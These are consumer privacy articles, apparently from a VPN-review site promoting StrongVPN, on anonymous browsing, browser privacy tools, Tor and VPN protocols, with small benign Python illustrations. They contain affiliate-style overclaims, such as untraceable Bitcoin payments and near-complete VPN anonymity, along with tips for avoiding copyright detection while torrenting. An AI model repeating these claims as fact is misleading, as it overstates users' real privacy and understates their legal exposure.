Then there’s the issue of illegal activities. Previously, nobody would know if you were breaking the law in the privacy of your own home. However, with the increase in logs, activities like torrenting can result in warnings, loss of service, or huge fines.

Without a VPN, torrents can be traced straight back to the user. Copyright holders hire companies to search through swarms of people torrenting their property. With an IP address, they can request a user’s details from the ISP and pursue legal action. The ISP is often compelled to do this or face legal repercussions themselves.

Though torrenting is a morally grey area, this can also affect customers who have done nothing wrong. WiFi networks can be hacked or information can be incorrect. In 2010, 53-year-old Cathi Paradiso ran into this problem when she was accused of downloading 18 films and TV shows illegally. In reality, her IP address was identified incorrectly, and her internet access cut off unjustly. It’s clear that even if you’re a regular internet user, anonymous browsing has its benefits.

What Is Anonymous Browsing & How Does it Help?

Anonymous browsing is usually achieved by routing a normal internet connection through a virtual private network. We won’t go into too much detail here, as it’s been already covered in our Beginner’s Guide to VPNs.

However, it’s important to have a basic idea of how a VPN can provide anonymous browsing. A VPN uses a method called tunnelling to wrap the data packets you send to your ISP in encryption. Various protocols such as OpenVPN, L2TP, PPTP and SSTP are used to achieve this. Through a VPN, your information goes from clear and readable to a string of random letters and numbers.

As a result, those trying to grab the data in transit get a useless pile of text. They don’t have the cypher, so they can’t unlock it. This is particularly useful on public WiFi, where hackers can often see what you are doing and perform attacks.

It also has the knock-on effect of hiding your IP address. The connection goes through the servers of the VPN provider, where it’s assigned an anonymous IP address from the server. Unlike ISPs, the best VPNs don’t keep logs, so the original IP address can’t be handed over to third parties and the user can surf anonymously.

However, this anonymous browsing doesn’t always extend to web trackers. Various methods can allow them to grab identifying information like IP addresses despite a VPN connection. Thankfully, many of the providers have built-in protection for this: Domain Name System (DNS) requests are routed through their servers and resolved by a special process that protects the user. As a result, malicious domains can’t find the user’s true identity.

How to Get VPN Services

Fortunately, it’s quite easy to browse anonymously via a VPN. There are thousands of different providers out there, each with different merits and price points. Some can even be used free of charge, but they can be subject to bandwidth caps and have been known to sell user data. For a premium and safe service, it’s always best to go with a paid provider.

We strongly recommend you examine StrongVPN - one of the most stable and fast VPN service providers globally.

Luckily, we have rounded up all the best VPNs so that you don’t have to search through hundreds yourself. Our experts have summarised the major features of each, ranking them based on quality.

Once you have found one that meets your requirements, you’ll have to sign up. You usually need an email address, password, and a payment method. The privacy conscious can often use bitcoins or trade gift cards to protect their identity while paying.

That payment can be anywhere between $3-$8 per month, depending on the provider. You usually get a better service the more you pay, but there are some exceptions. Either way, it’s a small price for anonymous browsing, whether you’re using a VPN to torrent, or are simply concerned about identity theft and government surveillance.

On sign up, you usually get an email with a username and password, as well as a link to the login page. Some providers will take care of this for you through a download link that incorporates sign-in details.

You then install the program, enter your details, and click connect. They have clients for all the major platforms, including Mac OS X, Windows, iOS, and Android. The Best VPN providers have thousands of servers all over the world and can provide fast, anonymous browsing in a few minutes.

Some VPNs provide details for an additional SOCKS5 proxy, which you can read about here. This can provide anonymous browsing against web hosts, but not the ISP or government.

Best Practices For Enhanced Protection

Though VPNs are great for browsing anonymously, they aren’t infallible. There are many methods to get information, and the providers can’t protect against them all. For complete anonymity on the internet, you may want to take some additional steps.

Cookies & Browser History

One thing a VPN cannot control is the data that’s stored locally on your computer. As you browse the web, your computer keeps a record of the history so you can go back to it later. It also retains cookies, which will save your settings on various websites, and images, so that you don’t have to download them every time.

The implications of this are fairly straightforward. If somebody gets access to your computer, physically or remotely, they have tons of information about you. To avoid this, you’ll want to use the “Private Browsing” feature in your browser.

In Firefox, you can get there by hitting the fly out menu on the top right and pressing New Private Window. Alternatively, you can press Ctrl+Shift+P.

Anonymous browsing in Firefox - Enabling a new private window

The things you do in this session will not be recorded. That covers the pages you visit, cookies, searches, and temporary files. There’s also the option for tracking protection, which will block many of those third parties we talked about earlier. However, Firefox does keep downloads and bookmarks for later use.

firefox private browsing tracking protection

Mozilla also stresses that Private Browsing doesn’t necessarily mean anonymous browsing. By itself, this is no protection against the information ISPs and government agencies collect. You’ll still need a VPN for that.

Google Chrome users can make use of a similar feature, though it has a different name. Incognito mode provides much of the same functionality but doesn’t have tracking protection like Firefox. Its shortcut is also different, using Ctrl+Shift+N.

Anonymous browsing in Chrome - Enabling an incognito mode window

Like Mozilla, Google stresses that Incognito mode does not provide anonymous browsing at work, home or any other location. Once more, files and bookmarks are still stored, so you have to be careful to delete those afterwards.

Other browsers have this functionality built in. In Internet Explorer and Edge, it’s called InPrivate Browsing/Window, with the same Ctrl+Shift+P shortcut as Firefox. Mac OS X users can use Private Browsing in Safari for the same effect.

Though they took a little while to catch up, most mobile browsers support it too. In Firefox, it’s called “New Private Tab” while in Chrome it's “New incognito tab”. Most Android stock browsers also support private browsing, though there are a few exceptions.

Enabling safe private browsing in Firefox, Chrome and Android O/S

The Safari browser on iOS also supports anonymous browsing. It can be found by hitting the icon, tapping Private, and then Done. This applies to iPads, iPods, iPhones, and most other Apple devices.

Safari Web Browser - Private Mode

Web Trackers & Encryption

Unfortunately, Firefox is the only one of these browsers that fights tracking. We highly recommend using Firefox if you are privacy conscious, but sometimes that’s not possible. For enhanced anonymous browsing, you should consider using browser plugins on Chrome, Firefox, or Edge.

Privacy Badger

Privacy Badger is an extension created and managed by the Electronic Frontier Foundation (EFF). It stops third-party trackers from following you across the web. Based on smart algorithms and policies, it brings protection to windows that aren’t private browsing. It’s also a little more advanced than Firefox’s methods.

Privacy Badger helps enforce anonymous browsing

However, Privacy Badger can prevent some functions like sharing articles to Facebook. Thankfully, EFF has built a simple slider system that lets you turn trackers on and off at will. Green means the tracker is third-party but isn’t following you across the web, so it’s allowed. Red means it has been completely blocked. Yellow means the tracker is necessary for web browsing, but its cookies have been blocked.

There is one caveat. Privacy Badger blocks third-party trackers, but it doesn’t stop tracking from the first party websites.

 firefox-lightbeam

Referring to our diagram, it blocks all the little triangles, but not the large circles. If you frequently visit a website, they may still collect information. You should still be using a VPN if you want to surf anonymously.

uBlock Origin

As well as Privacy Badger, you may want to consider an Ad-Blocker. uBlock Origin has a dual purpose, blocking trackers and malware as well as advertisements. It’s compatible with Privacy Badger, so you can use both at the same time.

What’s more, uBlock protects against WebRTC leaks. WebRTC is a communications protocol that lets you share files and video in real-time without the need for plugins. Unfortunately, it can also reveal a user’s true IP address, even if they’re using a VPN.

You can enable protection in uBlock Origin by hitting the settings tab. Under the Settings tab, you’ll see an option named Prevent WebRTC from leaking local IP addresses. Hit the checkbox and you’re done:

uBlock Origin - Protection Against Malware, Trackers & WebRTC

It’s worth noting that this feature won’t provide anonymous browsing if you aren’t using a VPN. It only hides your local IP address, so the IP of non-VPN users will be visible.

HTTPS Encryption

You should also be forcing an HTTPS connection wherever possible. HTTPS provides SSL encryption, which makes it harder for attackers to intercept your communications. This is particularly important if you’re using public WiFi. Visiting an HTTP website lets attackers packet-sniff and spy on what you are doing, which can lead to the capture of passwords, bank details, or personal information.

Though using a VPN will protect you from this, it never hurts to have an extra layer of protection. Before the initial connection of a VPN there’s a small window where you are connected to WiFi, but not to the VPN. It can also be a problem if your VPN cuts out and you don’t have a backup.

Though HTTPS is rapidly spreading, the implementation is still limited on many websites. Visiting the site from a link with “http://” in front often takes users to the unencrypted version. This can be a major problem if the site links back to itself this way.

Thankfully, EFF has a solution once more. HTTPS Everywhere forces SSL encryption no matter what link you click. It uses “clever technology” to rewrite requests into a HTTPS format and prevent interception.

Though HTTPS Everywhere can’t help when sites don’t support SSL at all, it does create a more consistent experience on those that do. It will also warn you when portions of a website can’t be encrypted, such as images. When you’re on Public WiFi, you can additionally choose to block all HTTP sites.

By itself, HTTPS Everywhere does not provide anonymous browsing. An interested party will still be able to see what web pages you are accessing. However, on sites that support SSL, it will stop people on the same network seeing specifics.

The Tor Browser

Finally, the extra conscious can use Tor to protect their identity. The Tor Browser bundles several add-ons into its core, including NoScript, an extension that blocks JavaScript, Flash and Java tracking. It also incorporates HTTPS Everywhere for added protection.

However, Tor’s main privacy feature is its underlying protocols. Communication in Tor is layered in encryption. Data sent through the browser passes through a series of relay computers, each decrypting a small chunk (one layer). Each link in the chain only knows the IP address of the hop before it, so the user can surf anonymously.

Though Tor has some security issues, it can be used on top of a VPN to provide an extra barrier for attackers or law enforcement to get through. It’s not a substitute for a paid VPN, but it does provide considerable protection over regular browsing.

Mobile Devices

On mobile devices, anonymous browsing can be harder to achieve. If you don’t want to be tracked across the web, you may have to change your browser.

Unlike Firefox, Chrome does not support extensions on mobile. This means the aforementioned addons can’t be installed. To surf anonymously, you should be using Firefox or a dedicated privacy browser.

Users of Mozilla’s browser can go to addons.mozilla.org/android and pick up HTTPS Everywhere, uBlock, and Privacy Badger just like on desktop. They require no additional permissions and work just as well.

If you don’t like Firefox, there are still a few options:

  • Ghostery Browser (Android, iOS)– inbuilt tracking protection and other privacy features.
  • Brave Browser (Android, iOS) – inbuilt ad blocking, tracker blocking, HTTPS Everywhere, and script blocking.
  • Orfox (Android) – Official Tor-based browser with NoScript and HTTPS Everywhere, plus automatic history and cookie deletion. Removes permission requests for Contacts, Camera, Microphone, Location and NFC. Removes WebRTC.
  • Onion Browser (iOS) – Unofficial, open source Tor browser. NoScript-like mode and user-agent spoofing.

Despite these methods, it’s important to realise that mobile devices are not a substitute for desktop when it comes to anonymous browsing. By default, phones have far more built-in tracking, from location services to cell-tower tracking and more. If you’re doing something questionable, it’s best to stick to a PC.

Summary

The bottom line is that though you can add protection free of charge, it won’t give you fully anonymous browsing like a VPN. Though uBlock and Privacy Badger protect against web tracking, they do nothing to stop spying by ISPs or government agencies.

A VPN can protect users against web tracking, ISP tracking, government spying, and man-in-the-middle attacks. They are low-cost, easy to implement, and allow a fast browsing experience, unlike Tor. Though they aren’t perfect, extra precautions make them as close to it as possible. VPNs are therefore the natural solution for anonymous surfing at work, on public WiFi, or at home.


What is a VPN? VPNs for Beginners - Everything You Need to Know About VPNs, Anonymous Browsing, Torrenting & VPN Security Features

What is a VPN?

VPN (Virtual Private Network) is a well-known acronym amongst regular internet users. Initially used within businesses to securely connect to the corporate network, nowadays it’s used by almost every type of user for anonymous browsing, protecting their privacy and stopping ISPs and government agencies from tracking their online activities and transactions. These agencies look to catch users performing illegal file sharing of movies and music albums, torrenting, or even accessing geo-restricted content such as Netflix, Hulu and other streaming services.

With the exponential rise of internet security threats it doesn’t really matter what type of device you’re using - whether it’s a PC, MAC, tablet, iPhone, Android device or smartphone - the risk is the same. Every single one of these devices can be tracked and their precise location known without any effort.

For example, the screenshot below was taken from a mobile phone. It shows a website visited that is able to track the mobile device’s IP address (49.185.251.16) and retrieve a significant amount of information regarding its location. It’s detected the country (Australia), the state (VIC), City (Melbourne), ISP/Mobile carrier (Optus) plus location and geographic coordinates (latitude and longitude)!

Information captured from a non-VPN internet user

As you can appreciate, the amount of information websites can capture is alarming. In a similar way ISPs, hackers and government agencies can intercept and capture traffic to and from a user’s mobile device or PC at home.

Now that we appreciate how exposed we really are, let’s take a look at how VPNs help protect our identity and personal information.

We highly recommend the StrongVPN service provider - one of the world’s largest and most secure VPN providers.

Who Needs a VPN?

A VPN can offer a number of substantial advantages and, depending on your internet activities, can prove to be mandatory.

A VPN service will allow you to “hide” your physical location by masking the IP address assigned by your internet service provider (ISP). In addition, a VPN provides a basic level of security and confidentiality as all information to and from your computer or mobile device is encrypted. This prevents hackers or ISPs from monitoring your online activities.

Users typically require a VPN service for any of the following activities:

  • Hide your internet activities from your ISP and government. ISPs around the world unofficially monitor user traffic in order to intercept sensitive or top secret information. The “Five Eyes” – a global intelligence alliance between the US, UK, Canada, Australia and New Zealand – monitors electronic information (email, faxes, web traffic etc) and private communication channels (VPNs), with wider partner networks such as the Nine Eyes and Fourteen Eyes extending that cooperation. The National Security Agency (NSA) was uncovered spying on hundreds of thousands of VPN connections based on Cisco’s PIX Firewalls for over a decade, thanks to a VPN exploit it discovered and never shared with the public.
  • Accessing geo-restricted content. A prime example is accessing US-based Netflix or Hulu when travelling overseas, or accessing sites providing local online video/streaming, TV shows etc from anywhere around the world.
  • Bypassing web filters and accessing restricted websites or internet services such as online gaming, Skype, Dropbox, OneDrive etc. Recent bans by governments blocking popular Torrent sites such as ThePiratebay.org, TorrentHound, Torrentz, IsoHunt and others have pushed users to VPN services in order to access these sites and services without restriction.
  • Peer-to-Peer (P2P) file sharing. Usually blocked by firewalls or ISPs, which is why users are moving to VPN and Tor based networks in order to freely share data with each other without having to worry about being tracked or blocked.
  • Torrenting. A big topic indeed. While there are many torrents that are legally distributed, e.g. Linux ISO images, open-source applications and games, torrent seeders and leechers are monitored by agencies acting on behalf of their clients, the MPAA (Motion Picture Association of America) and RIAA (Recording Industry Association of America), to protect their copyrighted material. While these agencies monitor and stop illegal video/music downloading, they have been found on many occasions to incorrectly accuse citizens of illegally downloading copyrighted content.
  • Avoid Bandwidth Throttling. ISPs are primarily responsible for this one. In order to save bandwidth they unofficially throttle torrent or other similar traffic, slowing download speeds considerably and sometimes to the point where users quit downloading. When it comes to using a VPN for torrenting, P2P and file sharing, users can avoid bandwidth throttling and in many cases increase their download speeds up to 3 times!
  • Accessing the internet from public WiFi hotspots. Using Public WiFi and Guest WiFi hotspots poses serious security threats. These are overcome with the usage of VPN services.

The Tor network is an alternative anonymity solution, also used to access the Dark Web. Readers interested in how Tor works and how it compares against a VPN can also check our Tor vs VPN article.

Accessing The Internet Without a VPN

Below is a diagram showing a typical user accessing the internet without a VPN. The user’s IP address is assigned by the ISP and is visible to the internet. Any online resource accessed by the user is completely visible to the ISP and anyone monitoring the user’s IP address:

Unencrypted internet traffic is visible and easily monitored

Of course resources such as Internet Banking usually encrypt the data transferred between the client and the server but the traffic source (user IP) and destination (server IP) are still fully visible. Similarly other activities such as Torrent Downloads are fully traceable back to the user.

It should also be noted that ISPs keep log files of their users’ IP addresses. This means the ISP is fully aware of the IP address assigned to each of its users. In many countries these logs must, by law, be stored for years and can be used as evidence in the event of a lawsuit or investigation. This applies to home and mobile users.

Using a VPN Service Provider Changes The Game

To use a VPN service you must first register with a VPN Service Provider of your choice. VPN subscriptions start from as low as $3 - $8 US per month, making them affordable for any user. Once you’ve purchased a subscription you can download and install the provided VPN Client onto your devices.

With the VPN Client you are able to connect to one of your VPN Provider’s servers, which are located in various countries. Once connected, a “tunnel” is created between your device and the VPN server and all traffic is redirected to the VPN server and from there to the internet.

Any traffic traversing the tunnel is protected via special encryption mechanisms. Traffic entering the tunnel is encrypted while traffic exiting the tunnel is decrypted.

This means that anyone monitoring your internet connection, e.g. your ISP, a hacker or a government agency, is unable to see your internet activities. All they can see is your encrypted traffic to the VPN server you’re connected to.
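
As a rough illustration of this encrypt-on-entry, decrypt-on-exit behaviour, the Python sketch below encrypts a request on the “client” side and decrypts it at the “VPN server”. Real VPN protocols (IPSec, OpenVPN etc.) do this per IP packet at the network layer; this is only a conceptual sketch and assumes the third-party cryptography package is installed:

from cryptography.fernet import Fernet

# Conceptual sketch only - real VPNs encrypt whole IP packets, not text strings.
tunnel_key = Fernet.generate_key()   # stands in for the key negotiated between client and server
tunnel = Fernet(tunnel_key)

def client_send(payload: bytes) -> bytes:
    # What an observer on your connection sees: opaque ciphertext headed to the VPN server.
    return tunnel.encrypt(payload)

def vpn_server_receive(ciphertext: bytes) -> bytes:
    # The VPN server decrypts the traffic and forwards the original request to the internet.
    return tunnel.decrypt(ciphertext)

on_the_wire = client_send(b"GET http://news.example.com/ HTTP/1.1")
print(on_the_wire[:40])                  # unreadable to anyone monitoring the link
print(vpn_server_receive(on_the_wire))   # the original request, recovered at the tunnel exit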

 

A VPN helps protect and encrypt all traffic to and from the internet avoiding any monitoring

When casually accessing websites or other online services it is unlikely they’ll be able to track your identity unless they require you to authenticate. For example, if you need to access your Gmail account you’ll need to provide your username and password. At that point your identity is known to Google even though you’re connecting via VPN; however, Google won’t be able to track your real location thanks to the VPN.

On the other hand if you are downloading a torrent file you don’t need to provide any credentials and therefore your identity remains hidden as long as you’re connected to the VPN.

To understand how well a VPN Service can disguise your activities, let’s go back to the initial example with the mobile phone and see how well a VPN Provider manages to hide a real IP address after connecting to a VPN server located in Canada:

Changing locations. From Melbourne, Australia to Canada thanks to our VPN service

Notice how I’m now located in Canada and assigned a Canadian-based IP address. This is because our mobile’s internet traffic is tunnelled through the VPN all the way to the Canadian-based VPN server and exits from that point to the internet.

VPN Service Provider Shared IP vs Dedicated IP

When connecting to a VPN Service Provider you’ll usually be assigned a Shared IP address, that is, an IP address that is used by many users simultaneously. While using a Shared IP address might not sound ideal, it does in fact provide increased anonymity as opposed to using a Dedicated IP address that is solely assigned to your VPN account.

VPN Service Provider with Shared IP address

Dedicated IP addresses are usually required when accessing IP restricted servers or websites. Running a website or FTP server off your VPN Service Provider would also be a reason to make use of a Dedicated IP address.

For the majority of VPN users who perform casual web browsing, downloading, file sharing and require anonymous browsing capabilities the Shared IP address is considered a secure option.

Smart-DNS Proxy Server

Smart-DNS is a newer service provided by VPN Service Providers. Some offer it as an add-on service while others include it with the VPN subscription.

We’ve already explained that with a VPN service all internet traffic is channelled through an encrypted connection to a VPN server and exits to the internet from there.

With Smart-DNS, a connection is established between the client and the Smart-DNS server; however, communications are not encrypted and only selected traffic is channelled to the Smart-DNS server, which works like a proxy server to unlock access to geo-restricted services such as TV shows, Netflix and others.

A Smart-DNS Proxy channels specific requests and data to unlock geo-restrictions

This is achieved by overriding selected DNS entries, e.g. www.netflix.com, so that DNS queries resolve to the address of the Smart-DNS server rather than the real server. The Smart-DNS server accepts client requests and acts as a proxy so that selected services are channelled through it, allowing access to region-restricted or blocked content from anywhere in the world.
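
Conceptually, the override works like the small Python sketch below: only hostnames on the service’s list resolve to the Smart-DNS proxy, while everything else resolves normally. The proxy address and the domain list shown are hypothetical examples:

import socket

SMART_DNS_PROXY = "203.0.113.10"                 # documentation-range example IP
OVERRIDDEN = {"www.netflix.com", "www.hulu.com"} # geo-restricted services to proxy

def resolve(hostname: str) -> str:
    if hostname in OVERRIDDEN:
        # Traffic for these services is steered to the Smart-DNS proxy,
        # which forwards it from a region where the content is available.
        return SMART_DNS_PROXY
    # Everything else bypasses the proxy and resolves as usual (unencrypted).
    return socket.gethostbyname(hostname)

print(resolve("www.netflix.com"))   # -> 203.0.113.10 (the proxy)
print(resolve("www.example.org"))   # -> the site's real address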

It’s important to keep in mind that Smart-DNS service is not a VPN Service replacement. All traffic sent and received via the Smart-DNS service is unencrypted and speeds are usually faster compared to a VPN thanks to the absence of encryption, making it an ideal solution for accessing region-restricted streaming services or services where data encryption is not important.

Impact Of a VPN On Your Mobile Device’s Speed, Battery Or Computer

Running a VPN connection will have an impact on your mobile device or computer. The level of impact will vary between different devices and their CPU processing capacity.

Following are key factors that will determine the impact on your device/system:

  • CPU or processing power of your device (Single Core, Quad Core etc).
  • Quality of the VPN Client software (poorly or well written software).
  • VPN Encryption algorithm used to encrypt/decrypt data.

Let’s take a look at each point.

CPU – Processing Power Of Your Device

The faster the CPU, the smaller the impact will be. Computers with Core i3, Core i5 or Core i7 processors offer more than enough power to perform all the necessary processing, and a VPN will not significantly affect the user experience.

Mobile phones with dual- or quad-core CPUs should also be able to handle a lightweight VPN client without any difficulty; however, you must keep in mind that heavy internet usage also means more work for the CPU – this translates to a battery that is drained at a much faster rate. Mobile users should generally use the internet in the same way as before installing the VPN client to see the real impact it will have on their device. Newer mobile devices shouldn’t experience any noticeable difference.

Quality Of The VPN Client Software

Just like any piece of software a well-designed VPN application will function without problems and will limit its usage of system resources. There are VPN Providers that offer very cheap subscriptions, however, their VPN Client software might be buggy causing either frequent crashes or taking a long time to respond to user actions.

It’s recommended to make use of high-quality VPN providers such as StrongVPN and ExpressVPN who develop and thoroughly test their software. Our Best VPN review offers a comparison between 5 Top VPN Services for you to choose from.

VPN Encryption Algorithm

There are quite a few VPN encryption options available through your VPN client and each one of these will provide you with a different level of security. Stronger encryption, e.g. L2TP/IPSec, means better security; however, it will take a slightly larger toll on your device’s CPU, which must work harder to encrypt and decrypt your traffic due to the complexity of the stronger protocols.

On the other hand, selecting a weaker encryption protocol such as PPTP means that demands on the CPU will be lower but so will the security offered.

Newer protocols, such as OpenVPN, combine the best of both worlds and deliver a fast & secure VPN service at minimal cost to your CPU. OpenVPN is generally the recommended VPN protocol.

VPN Protocols

As mentioned earlier a VPN makes use of different encryption protocols to secure the connection between the end-user and the VPN server. Selecting the best VPN protocol is important so let’s discover the most commonly supported encryption protocols used by VPN providers:

  • PPTP - Point to Point Tunnel Protocol. Old lightweight VPN protocol which is still very popular but doesn’t offer much security. Ideal for streaming and basic VPN needs but not for torrenting.
  • L2TP / IPSec - Layer 2 Tunnel Protocol & IP Security. The evolution of PPTP offering much better security and encryption at the slight expense of speed.
  • SSTP - Secure Socket Tunneling Protocol. A flexible SSL-based encryption by Microsoft. Good alternative to L2TP/IPSec but not as good as OpenVPN.
  • OpenVPN – a newer open-source VPN protocol that offers great security, flexibility and compatibility. Supported by router firmware such as DD-WRT, Tomato and others.

Users should be aware that not all encryption protocols offer the same security and performance level. For example, PPTP is an older VPN protocol whose encryption is weak and considered broken; it essentially just encapsulates the user’s data. Think of it as placing a letter (data) inside a standard envelope. The envelope is light, so you can carry more of them within a specific period (high performance / throughput). Despite the lower security offered by PPTP, it is still widely used today, partly because many users don’t understand the level of security it provides, and partly because it has penetrated the market over the past 15 years and is still supported by newer VPN devices and servers.

On the other hand, L2TP/IPSec is the evolution of PPTP and was introduced as a more secure alternative. It offers significantly higher security but is slower because the protocol carries more overhead.

SSTP is a Microsoft proprietary protocol found on all Windows operating systems after Windows Vista Service Pack 1. SSTP is preferred over PPTP and L2TP as it is able to pass through most firewalls without a problem (requires TCP Port 443) whereas PPTP and L2TP/IPSec might not be able to pass through a firewall as they use uncommon TCP/UDP ports which are usually blocked by corporate or guest networks.

Finally, OpenVPN is by far the preferred VPN protocol. It’s an open-source (freely distributed) newer technology supported by almost every device and VPN service provider. It’s flexible, offers great security, has moderate CPU demands and will run in almost any environment, passing through firewalls without a problem. In addition, router software such as DD-WRT, Tomato and Mikrotik supports OpenVPN, allowing users to connect to their VPN provider at the router level and removing the need for any VPN client software on devices connecting to the home or business network.

Using the right VPN encryption protocol is important as it will significantly affect the security provided as well as your upload/download speeds.

VPN Servers – The More – The Merrier

VPN Service Providers generally deploy VPN servers around the globe to accommodate their customers. Using a VPN Provider that has hundreds or thousands of servers deployed is always a great option and there are plenty of reasons for this:

  • More servers means better VPN user distribution. This translates to faster servers and fewer users per VPN server.
  • Higher service availability. If one or many servers go down you’ll have plenty of others to connect to therefore limiting the impact on your VPN service.
  • Ability to access geo-restricted content for every country that has a VPN server available for you to connect to.
  • Ability to connect to a VPN server that is located closer to the source you are trying to access, therefore providing better download/upload speeds.

If the VPN Provider does not reveal the number of VPN servers it maintains, then check the list of countries and cities where VPN servers are available – this information is usually provided and is a good indication that there are plenty of servers to select from.

VPN Kill-Switch Feature – Avoid Accidentally Exposing Your Identity

The VPN Kill-Switch is a feature built into the VPN client that, when enabled, continuously monitors your connection to ensure all traffic is passing through the VPN.

When the Kill-Switch detects that your VPN has disconnected, it automatically stops all internet traffic to and from your PC or mobile device to prevent it from exposing its real identity – its IP address.

A VPN with the Kill-Switch enabled is best practice for torrenting, as it stops users from accidentally exposing themselves to the public, especially when torrenting overnight or when the PC is left switched on to complete its download(s).
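
In essence, a kill-switch is a watchdog loop like the rough Python sketch below: keep checking that the VPN tunnel is up and block traffic the moment it is not. The interface name, the Linux ip command used for the check and the “block” action are all placeholder assumptions; real VPN clients hook directly into the operating system firewall:

import subprocess
import time

VPN_INTERFACE = "tun0"   # assumed name of the VPN tunnel interface (Linux example)

def vpn_is_up() -> bool:
    # Simple heuristic: does the tunnel interface exist and have an IP address?
    result = subprocess.run(["ip", "addr", "show", VPN_INTERFACE],
                            capture_output=True, text=True)
    return result.returncode == 0 and "inet " in result.stdout

def block_all_traffic() -> None:
    # Placeholder action - a real kill-switch inserts firewall rules that drop
    # everything except traffic to the VPN server itself.
    print("VPN down! Blocking internet traffic until the tunnel is restored.")

while True:
    if not vpn_is_up():
        block_all_traffic()
        break
    time.sleep(5)        # re-check the tunnel every few seconds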

DNS Leak Protection

When connecting to a VPN the PC or mobile device is forced to use secure DNS servers for all DNS queries. These DNS servers are usually the VPN provider’s own. This ensures the ISP and government are unable to track any DNS queries which might reveal the user’s online activities.

A DNS Leak occurs when the operating system begins sending DNS queries to the ISP’s DNS or other insecure DNS servers. The reason for a DNS leak might be intentionally modified device settings (e.g. DNS server settings) or even the way the operating system behaves – which is the case with the Windows operating system.

One of Windows 10’s features allows it to direct DNS requests to the local network router or ISP, bypassing the VPN tunnel. This setting was designed to enhance and speed up the DNS query process; however, it has created a major security issue as users can easily be exposed without knowing.
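
A very basic leak check simply compares the resolvers the operating system is configured to use against the VPN provider’s own DNS servers, as in the Python sketch below. The provider addresses are hypothetical and reading /etc/resolv.conf only applies to Linux and similar systems; thorough testing is covered in the article mentioned next:

# Basic DNS-leak check sketch: are the configured resolvers the VPN's own servers?
VPN_DNS_SERVERS = {"10.8.0.1", "10.8.0.2"}   # assumed addresses pushed by the VPN

def configured_resolvers(path="/etc/resolv.conf"):
    servers = []
    with open(path) as resolv_conf:
        for line in resolv_conf:
            if line.startswith("nameserver"):
                servers.append(line.split()[1])
    return servers

leaking = [s for s in configured_resolvers() if s not in VPN_DNS_SERVERS]
if leaking:
    print("Possible DNS leak - queries may be going to:", ", ".join(leaking))
else:
    print("All configured resolvers belong to the VPN provider.")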

Our DNS Leak Testing & Protection article explains the problem in-depth and provides ways to protect against it. A high-quality VPN service will include DNS leak protection embedded within the VPN client to help protect its users from being unknowingly exposed to this serious security threat.

‘No-Log’ VPN Service Provider Policy

Not all VPN Service Providers are completely anonymous. Some VPN Service Providers keep extensive logs of their users’ IP addresses and VPN login sessions.

A ‘no-log’ VPN Service does not keep any logs of its users or their online activities therefore making it extremely difficult to trace any of their online activities.

VPN Providers that keep some type of logs seriously risk exposing their users. In the event of a security breach, or government demand to access these logs, users are left vulnerable as it will make it easier to trace previous online activities.

VPN Service Providers who offer a “no log” policy usually state something along the following lines in their privacy policy:

“We never keep traffic logs, and we also don’t keep any logs that might enable someone to match an IP and timestamp back to a user.”

It’s important to keep in mind that depending on the country where the VPN Provider resides, they might be required by law to store their logs no matter what impression they give on their site. For example, countries such as Romania, Netherlands, Sweden and Luxembourg are not currently required to keep logs while other countries in the European Union are required to do so.

Make sure the VPN provider’s “no log” policy is absolutely clear to you before signing up.

Paying your VPN Service Provider without Exposing Your Identity

VPN Service providers accept a number of different payment methods, including credit cards (Visa, MasterCard), PayPal, Bitcoin and more.

While users can use any of the above methods for payment, those concerned about sharing personal information and seeking complete privacy can use Bitcoin.

Bitcoin is a form of digital currency that allows users and companies to transact online without going through a bank. Payments carry no direct trace of your identity and, since banks are not involved in the transaction, there are fewer fees for both the sending and receiving party.

Money-Back Guarantee – Making the Most Out of Your Trial

The money-back guarantee option is usually offered by the popular and reputable VPN Service Providers. Some offer a 3, 5, 7 or 30-day refund policy while others provide a free usage period, after which you are required to purchase a subscription if you wish to continue using the service.

Whichever the case, a “try before you buy” policy is always preferred since it provides you with the opportunity to try the service and ensure it works well for you. When trying a new VPN service it is always recommended to connect to multiple VPN servers throughout the trial period to get a good idea of how well the VPN provider is performing. Try downloading via torrent, access Netflix or similar services, visit frequently used websites and see how the service performs before committing to a long-term plan.

Finally ensure you are fully aware of the money-back guarantee conditions. Some VPN providers will happily provide a refund within the trial-period however they might refuse to issue the refund in case of excessive downloads.

Number of Simultaneous VPN Connections

Most VPN Service Providers support simultaneous connections on a single VPN account, allowing users with multiple devices, e.g. laptop, mobile phone, tablet etc, to connect from any of them.

Users who wish to take advantage of a VPN service will surely appreciate this capability and it’s quickly becoming very popular. Many users take advantage of this feature and share the VPN account with a friend to split the cost.

A minimum of two simultaneous VPN connections should be supported by your provider: one for the laptop/workstation and one for your mobile phone or tablet. Support for more than two devices is always nice to have, as you can easily share it with a friend.

Customer Support

VPNs have evolved enough today so that a user at any technical level should be able to download and install the VPN Client without difficulties. Nevertheless, if you’re new to VPNs the amount of information can often be overwhelming and confusing.

For this reason 24/7 Customer Support is important and it should be easily accessible via the provider’s website, email or even phone.

The most common method today is 24/7 online chat support followed by email support while some providers might even offer phone support.

With chat and email support you should be able to precisely describe any problem you are having so that the person on the other side can understand. This will help resolve your problem much faster and save time and unnecessary frustration.

Choosing the Right VPN Provider

With over 200 VPN Service Providers, making the right choice can be a very complicated and time-consuming task. While the price tag always plays a significant role it should not be the major decision-making factor.

Protecting your online privacy correctly is very important even if that means spending a few additional dollars.

Firewall.cx is the only network security site with industry security experts who have performed in-depth reviews of VPN providers to produce the Best VPN Service guide based on the following criteria:

  • VPN Speeds and Latency Test
  • VPN server locations (countries) and number of servers worldwide
  • Netflix VPN, Torrenting and Blocked sites, Geo-blocking Bypass
  • Security features (DNS Leak Protection, Kill Switch etc)
  • Multiple device login (Laptop, Phone, Tablet etc)
  • Encryption protocols (PPTP/L2TP IPSec/OpenVPN etc) & Support for Dedicated VPN Routers
  • No-Log Policy & Bitcoin payment support
  • User-Friendly VPN client interface
  • Pricing – based on a 12 month subscription

Summary

Understanding what a VPN service is and how it can help you protect your online privacy is very important today. Enabling anonymous browsing and protecting your online identity against attack is as equally important as running an antivirus on your computer. VPN Services help provide a significant level of identity protection while at the same time unlocking geo-restricted content with the click of a button. Protect your online transactions and activities with a highly recommended VPN Service today.


VPN Hotspot - How to Stay Safe on Public & Guest WiFi Networks

Is Guest WiFi Safe?

It’s hard to go to a pub, café, or hotel these days without running into public or guest WiFi. In many cases, an internet connection can feel like a necessity – keeping up with work or personal emails, arranging plans with friends, checking social media. Connecting is usually as easy as entering an email address, filling out a survey, or entering a code on a receipt.

